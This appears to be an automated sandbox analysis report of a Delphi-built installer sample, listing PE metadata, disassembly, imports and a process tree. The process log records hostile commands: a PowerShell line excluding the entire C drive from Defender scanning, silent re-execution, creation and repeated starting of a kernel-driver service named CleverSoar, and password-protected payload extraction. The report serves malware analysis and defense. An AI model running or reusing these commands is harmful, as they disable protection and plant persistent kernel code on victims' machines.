                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Time Stamp:0x6690DABD [Fri Jul 12 07:26:53 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:6
                            OS Version Minor:1
                            File Version Major:6
                            File Version Minor:1
                            Subsystem Version Major:6
                            Subsystem Version Minor:1
                            Import Hash:40ab50289f7ef5fae60801f88d4541fc
                            Instruction
                            push ebp
                            mov ebp, esp
                            add esp, FFFFFFA4h
                            push ebx
                            push esi
                            push edi
                            xor eax, eax
                            mov dword ptr [ebp-3Ch], eax
                            mov dword ptr [ebp-40h], eax
                            mov dword ptr [ebp-5Ch], eax
                            mov dword ptr [ebp-30h], eax
                            mov dword ptr [ebp-38h], eax
                            mov dword ptr [ebp-34h], eax
                            mov dword ptr [ebp-2Ch], eax
                            mov dword ptr [ebp-28h], eax
                            mov dword ptr [ebp-14h], eax
                            mov eax, 004A2EBCh
                            call 00007F00A8EAEE65h
                            xor eax, eax
                            push ebp
                            push 004A8AC1h
                            push dword ptr fs:[eax]
                            mov dword ptr fs:[eax], esp
                            xor edx, edx
                            push ebp
                            push 004A8A7Bh
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            mov eax, dword ptr [004B0634h]
                            call 00007F00A8F407EBh
                            call 00007F00A8F4033Eh
                            lea edx, dword ptr [ebp-14h]
                            xor eax, eax
                            call 00007F00A8F3B018h
                            mov edx, dword ptr [ebp-14h]
                            mov eax, 004B41F4h
                            call 00007F00A8EA8F13h
                            push 00000002h
                            push 00000000h
                            push 00000001h
                            mov ecx, dword ptr [004B41F4h]
                            mov dl, 01h
                            mov eax, dword ptr [0049CD14h]
                            call 00007F00A8F3C343h
                            mov dword ptr [004B41F8h], eax
                            xor edx, edx
                            push ebp
                            push 004A8A27h
                            push dword ptr fs:[edx]
                            mov dword ptr fs:[edx], esp
                            call 00007F00A8F40873h
                            mov dword ptr [004B4200h], eax
                            mov eax, dword ptr [004B4200h]
                            cmp dword ptr [eax+0Ch], 01h
                            jne 00007F00A8F4755Ah
                            mov eax, dword ptr [004B4200h]
                            mov edx, 00000028h
                            call 00007F00A8F3CC38h
                            mov edx, dword ptr [004B4200h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xb7000 | 0x71 | .edata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb5000 | 0xfec | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xcb000 | 0x11000 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xba000 | 0x10fa8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xb9000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xb52d4 | 0x25c | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xb6000 | 0x1a4 | .didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa568c | 0xa5800 | b889d302f6fc48a904de33d8d947ae80 | False | 0.3620185045317221 | data | 6.377190161826806 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext | 0xa7000 | 0x1b64 | 0x1c00 | 588dd0a8ab499300d3701cbd11b017d9 | False | 0.548828125 | data | 6.109264411030635 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xa9000 | 0x3838 | 0x3a00 | 5c0c76e77aef52ebc6702430837ccb6e | False | 0.35338092672413796 | data | 4.95916338709992 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss | 0xad000 | 0x7258 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xb5000 | 0xfec | 0x1000 | 627340dff539ef99048969aa4824fb2d | False | 0.380615234375 | data | 5.020404933181373 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata | 0xb6000 | 0x1a4 | 0x200 | fd11c1109737963cc6cb7258063abfd6 | False | 0.34765625 | data | 2.729290535217263 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata | 0xb7000 | 0x71 | 0x200 | 7de8ca0c7a61668a728fd3a88dc0942d | False | 0.1796875 | data | 1.305578535725827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls | 0xb8000 | 0x18 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xb9000 | 0x5d | 0x200 | d84006640084dc9f74a07c2ff9c7d656 | False | 0.189453125 | data | 1.3892750148744617 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xba000 | 0x10fa8 | 0x11000 | a85fda2741bd9417695daa5fc5a9d7a5 | False | 0.5789579503676471 | data | 6.709466460182023 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc | 0xcb000 | 0x11000 | 0x11000 | 100340e93592f17c49bc1c94c351b59d | False | 0.1877154181985294 | data | 3.722827410367583 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xcb678 | 0xa68 | Device independent bitmap graphic, 64 x 128 x 4, image size 2048 | English | United States | 0.1174924924924925
RT_ICON | 0xcc0e0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.15792682926829268
RT_ICON | 0xcc748 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23387096774193547
RT_ICON | 0xcca30 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.39864864864864863
RT_ICON | 0xccb58 | 0x1628 | Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors | English | United States | 0.08339210155148095
RT_ICON | 0xce180 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.1023454157782516
RT_ICON | 0xcf028 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.10649819494584838
RT_ICON | 0xcf8d0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.10838150289017341
RT_ICON | 0xcfe38 | 0x12e5 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.8712011577424024
RT_ICON | 0xd1120 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.05668398677373642
RT_ICON | 0xd5348 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.08475103734439834
RT_ICON | 0xd78f0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.09920262664165103
RT_ICON | 0xd8998 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.2047872340425532
RT_STRING | 0xd8e00 | 0x3f8 | data | | | 0.3198818897637795
RT_STRING | 0xd91f8 | 0x2dc | data | | | 0.36475409836065575
RT_STRING | 0xd94d4 | 0x430 | data | | | 0.40578358208955223
RT_STRING | 0xd9904 | 0x44c | data | | | 0.38636363636363635
RT_STRING | 0xd9d50 | 0x2d4 | data | | | 0.39226519337016574
RT_STRING | 0xda024 | 0xb8 | data | | | 0.6467391304347826
RT_STRING | 0xda0dc | 0x9c | data | | | 0.6410256410256411
RT_STRING | 0xda178 | 0x374 | data | | | 0.4230769230769231
RT_STRING | 0xda4ec | 0x398 | data | | | 0.3358695652173913
RT_STRING | 0xda884 | 0x368 | data | | | 0.3795871559633027
RT_STRING | 0xdabec | 0x2a4 | data | | | 0.4275147928994083
RT_RCDATA | 0xdae90 | 0x10 | data | | | 1.5
RT_RCDATA | 0xdaea0 | 0x310 | data | | | 0.6173469387755102
RT_RCDATA | 0xdb1b0 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0xdb1dc | 0xbc | data | English | United States | 0.6170212765957447
RT_VERSION | 0xdb298 | 0x584 | data | English | United States | 0.2769121813031161
RT_MANIFEST | 0xdb81c | 0x7a8 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3377551020408163
DLL | Import
kernel32.dll | GetACP, GetExitCodeProcess, CloseHandle, LocalFree, SizeofResource, VirtualProtect, QueryPerformanceFrequency, VirtualFree, GetFullPathNameW, GetProcessHeap, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVolumeInformationW, GetVersion, GetDriveTypeW, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetCommandLineW, GetSystemInfo, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, LCMapStringW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll | InitCommonControls
user32.dll | CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll | SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
advapi32.dll | ConvertStringSecurityDescriptorToSecurityDescriptorW, OpenThreadToken, AdjustTokenPrivileges, LookupPrivilegeValueW, RegOpenKeyExW, OpenProcessToken, FreeSid, AllocateAndInitializeSid, EqualSid, RegQueryValueExW, GetTokenInformation, ConvertSidToStringSidW, RegCloseKey
Name | Ordinal | Address
__dbk_fcall_wrapper | 2 | 0x40fc10
dbkFCallWrapperAddr | 1 | 0x4b063c
Language of compilation system | Country where language is spoken | Map
English | United States |
                            No network behavior found

                            Target ID:0
                            Start time:07:03:07
                            Start date:24/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe"
                            Imagebase:0x160000
                            File size:8'648'945 bytes
                            MD5 hash:D4C8420BEA7C19A44AB6AD71FD8DDE34
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:1
                            Start time:07:03:08
                            Start date:24/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-59BFB.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$2046C,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe"
                            Imagebase:0xa20000
                            File size:3'366'912 bytes
                            MD5 hash:E4680C0AB69900E6A19A0AA38BD54AAD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:3
                            Start time:07:03:08
                            Start date:24/12/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
                            Imagebase:0x7ff7be880000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:4
                            Start time:07:03:08
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:5
                            Start time:07:03:09
                            Start date:24/12/2024
                            Path:C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT
                            Imagebase:0x160000
                            File size:8'648'945 bytes
                            MD5 hash:D4C8420BEA7C19A44AB6AD71FD8DDE34
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:false

                            Target ID:6
                            Start time:07:03:10
                            Start date:24/12/2024
                            Path:C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\AppData\Local\Temp\is-R54A1.tmp\#U5b89#U88c5#U52a9#U624b2.0.7.tmp" /SL5="$20478,7694642,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.7.exe" /VERYSILENT
                            Imagebase:0xf00000
                            File size:3'366'912 bytes
                            MD5 hash:E4680C0AB69900E6A19A0AA38BD54AAD
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:Borland Delphi
                            Reputation:low
                            Has exited:true

                            Target ID:7
                            Start time:07:03:12
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:8
                            Start time:07:03:12
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:9
                            Start time:07:03:12
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:10
                            Start time:07:03:12
                            Start date:24/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
                            Imagebase:0xda0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 0%, ReversingLabs
                            Reputation:moderate
                            Has exited:true

                            Target ID:11
                            Start time:07:03:13
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:12
                            Start time:07:03:13
                            Start date:24/12/2024
                            Path:C:\Program Files (x86)\Windows NT\7zr.exe
                            Wow64 process (32bit):true
                            Commandline:7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
                            Imagebase:0xda0000
                            File size:831'200 bytes
                            MD5 hash:84DC4B92D860E8AEA55D12B1E87EA108
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:13
                            Start time:07:03:13
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            Target ID:14
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Imagebase:0x7ff6ef0c0000
                            File size:496'640 bytes
                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                            Has elevated privileges:true
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Has exited:false

                            Target ID:15
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:16
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:17
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:18
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:19
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:20
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:21
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:22
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:23
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:24
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:25
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:26
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:27
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:28
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:29
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:30
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff6d64d0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:31
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:32
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:33
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:34
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:35
                            Start time:07:03:14
                            Start date:24/12/2024
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6d64d0000
                            File size:862'208 bytes
                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:36
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\cmd.exe
                            Wow64 process (32bit):false
                            Commandline:cmd /c start sc start CleverSoar
                            Imagebase:0x7ff771ad0000
                            File size:289'792 bytes
                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Has exited:true

                            Target ID:37
                            Start time:07:03:15
                            Start date:24/12/2024
                            Path:C:\Windows\System32\sc.exe
                            Wow64 process (32bit):false
                            Commandline:sc start CleverSoar
                            Imagebase:0x7ff66bcf0000
                            File size:72'192 bytes
                            MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                            Has elevated privileges:true
                            Has administrator privileges:true
